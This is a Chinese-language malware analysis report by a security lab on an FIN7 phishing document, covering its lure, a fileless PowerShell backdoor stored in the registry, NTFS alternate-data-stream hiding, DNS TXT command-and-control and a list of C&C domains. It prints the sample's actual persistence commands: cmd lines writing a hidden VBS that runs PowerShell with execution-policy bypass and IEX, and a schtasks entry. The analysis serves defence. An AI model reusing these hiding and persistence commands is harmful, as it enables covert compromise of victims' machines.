FIN7 APT组织攻击木马分析报告">FIN7 APT组织攻击木马分析报告

事件背景

2017年3月,FireEye发布了一篇名黑客组织FIN7的APT攻击简报,报告称FIN7组织以钓鱼邮件为攻击渠道,主要对美国金融机构渗透攻击。组织的攻击利用DNS协议的TXT字段进行C&C通信。360威胁情报中心对此APT组织的攻击链条进行了梳理,对木马相关的技术进行了分析,揭示其一些有意思的技巧

目标样本

H ash d04b6410dddee19adec75f597c52e386 文件类型 W ord文档 文件大小 1,834,496 字节

攻击特点与攻击流程

FIN7攻击特点主要体现在:

1.  全部攻击过程使用非PE实现,钓鱼使用doc文件,后门使用powershell文件。

2.  使用ADS数据隐藏保存在磁盘中的非PE文件

3.  后门文件保存在注册表中,功能由Powershell实现

4.  与C&C通信使用DNS协议的TXT记录

5.  C&C地址从64个硬编码的地址中随机选择

攻击流程:

在整个攻击过程中,没有使用到PE文件,这在一定程度上躲避了安全软件的查杀。落地的文件也进行了技术上的隐藏,而真正的后门程序却已加密的方式存储在注册表中。

攻击者以钓鱼邮件为进入渠道,在恶意文档中嵌入vbs脚本,vbs脚本运行后解密后门程序写入注册表中,同时将调用后门程序的脚本以ads隐藏在磁盘文件中。在后门运行后,使用DNS TXT做为C&C通信方式。

样本分析

钓鱼邮件打开后,显示如下图所示,可以看到,文档中插入了一张图片,图片字体显示模糊。

通过分析,得到了钓鱼文档的制作过程:分别插入了一个 vbs的OLE对象与一张字迹模糊的图片,将OLE对象的图标设置为透明图标并置入图片对象的顶层,最将两个对象组合到一起,这样就达到了双击图片,实际上运行了vbs脚本的目的。

双击图片,就会打开vbs脚本,只有当用户点击弹出的对话框中的确定后,才会运行vbs脚本,如果在这时,用户点击了取消,就可以阻断这次攻击。

为了诱导用户双击图片运行vbs脚本,文档中还写入“ This document is protected by Microsoft Office and requires human verification   Please Enable Editing and Double Click on page below. ”(文档被 Microsoft Office  保护,请启用编辑并双击下面的图片)。

VBS 功能:

当上面的图片被双击运行后,程序后台会运行VBS脚本,该脚本功能为:调用powershell解密一大段字符,从代码中可以看出,解密出来的为一gz文件,因此可以将这大段base64解密后,保存成gz格式,使用解压工具得到压缩文件继续分析。

样本加载感染过程:

gz中的文件也是一个powershell脚本。脚本经过混淆,实现的功能是:判断当前用户是不是administartor权限,根据不同的权限写入不同的注册表内容,这些内容为开机后会解密执行的代码,随后通过ADS将加载注册表内容的vbs脚本写入 C:\ProgramData\ Windows :CtxDnsClient.vbs 文件中,并将该文件加入启动项和计划任务中。

原始的 powershell内容,可以看到powershell脚本经过了混淆:

后门程序写入注册表

P owershell写入到注册表中的后门程序的内容如下:


ADS隐藏磁盘文件

将要实现开机启动的文件写入到磁盘文件 C:\ProgramData\Windows:CtxDnsClient.vbs 中。

对于 Windows:CtxDnsClient.vbs 文件,使用了ADS数据隐藏技术。而通过ADS隐藏的数据在Windows系统中无法显示,文件大小也显示为0字节:

但是使用dir /r命令,可以看到ADS中有隐藏的数据

启动项中的隐藏的ads数据,dump出来后显示如下:

使用 ADS中隐藏数据内容为:

cmd /c "echo Set objShell = CreateObject(""Wscript.shell"") > C:\ProgramData\Windows:CtxDnsClient.vbs" 

cmd /c "echo objShell.run ""powershell -WindowStyle Hidden -executionpolicy bypass -C IEX ((Get-ItemProperty -Path HKCU:software\Microsoft\Windows).Part)"",0 >> C:\ProgramData\Windows:CtxDnsClient.vbs"

添加开机启动

创建的启动项,启动项位置为 HKCU \ Software\Microsoft\Windows\Currentversion\Run\

添加计划任务:

schtasks.exe /F /create /tn CtxDnsClient /tr "C:\Windows\system32\wscript.exe C:\ProgramData\Windows:CtxDnsClient.vbs " /sc onidle /i 30

通过上面这些过程,来实现程序的自启动。在系统重新启动后,启动项中的 wscript.exe 会加载 Windows:CtxDnsClient.vbs Windows:CtxDnsClient.vbs 中会使用powershell加载 HKCU \ Software\Microsoft\Windows \ Part 内容,part中实现的功能会加载注册表相同位置下的 CtxDnsClient 的内容。这里的内容就是真正的实现CC的功能。

C&C通信功能

这部分功能主要在注册表中的 HKCU \ Software\Microsoft\Windows CtxDnsClient 的内容中,主要功能为:从内置的64个域名中随机选择一个,查询该域名的SPF记录,用来实现自己的C&C通信。

创建名为 ”SourceFireSux” 的互斥体,防止程序重复运行:

编码过的 64个域名地址代码片段:

从这64个域名中,随机选取一个(如这里随机被选择到的为: pbbk.us ),加上www前缀,查询对应DNS TXT记录内容(即查询 www.pbbk.us 的dns txt记录)。

如果返回的内容为idle,则程序睡眠3.5秒到5.4秒的随机时间。

如果返回的内容为www,则表明这个域名现在正在攻击者控制之中,随后查询mail.pbbk.us的dns txt记录。

随后mail.pbbk.us返回的内容就被   powershell直接通过IEX调用执行。

IOC

木马尝试通信的C&C地址:

域名 注册人 注册时间 备注 www.grij.us Frank Walters 2017/2/19 3:09 www.kwoe.us Frank Walters 2017/2/19 3:09 www.zugh.us Frank Walters 2017/2/19 3:09 www.pafk.us Frank Walters 2017/2/19 3:09 www.cuuo.us Frank Walters 2017/2/19 3:07 www.ooyh.us Frank Walters 2017/2/19 3:07 www.vxqt.us Frank Walters 2017/2/19 3:06 www.cgqy.us Frank Walters 2017/2/19 3:07 www.wfsv.us Frank Walters 2017/2/19 3:07 www.palj.us Frank Walters 2017/2/19 3:09 www.idjb.us Frank Walters 2017/2/19 3:09 www.zjav.us Frank Walters 2017/2/19 3:09 www.mewt.us Frank Walters 2017/2/19 3:06 www.vkpo.us Frank Walters 2017/2/19 3:07 www.wqiy.info WhoisGuard Protected 2017/2/18 19:08 www.wvzu.pw WhoisGuard Protected 2017/2/18 0:00 www.gxhp.top WhoisGuard Protected 2017/2/18 19:07 www.hvzr.info WhoisGuard Protected 2017/2/18 19:07 www.reld.info WhoisGuard Protected 2017/2/18 0:00 www.vqba.info WhoisGuard Protected 2017/2/18 19:06 www.oxrp.info WhoisGuard Protected 2017/2/18 19:08 www.dvso.pw WhoisGuard Protected 2017/2/18 0:00 www.bvyv.club www.bwuk.club www.cihr.site www.coec.club www.oyaw.club www.pbbk.us www.ppdx.pw www.pvze.club www.qefg.info www.qlpa.club www.ueox.club www.ufyb.club www.dbxa.pw www.eady.club www.enuv.club www.eter.pw www.utca.site www.vdfe.site www.vjro.club www.fbjz.pw www.fhyi.club www.futh.pw www.gnoa.pw www.vwcq.us www.jimw.club www.jomp.site www.jxhv.site www.kshv.site www.ysxy.pw www.zmyo.club www.zody.pw www.lhlv.club www.lnoy.site www.lvrm.pw www.mfka.pw www.nxpu.site www.oaax.site www.odyr.us www.oknz.club www.ooep.pw www.ckwl.pw Lin Shi Mo Ban 2015/11/11 0:00 不能作为IOC www.zcnt.pw Lin Shi Mo Ban 2015/11/16 0:00 不能作为IOC

参考链接

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

赞 (0) 评论 分享 ()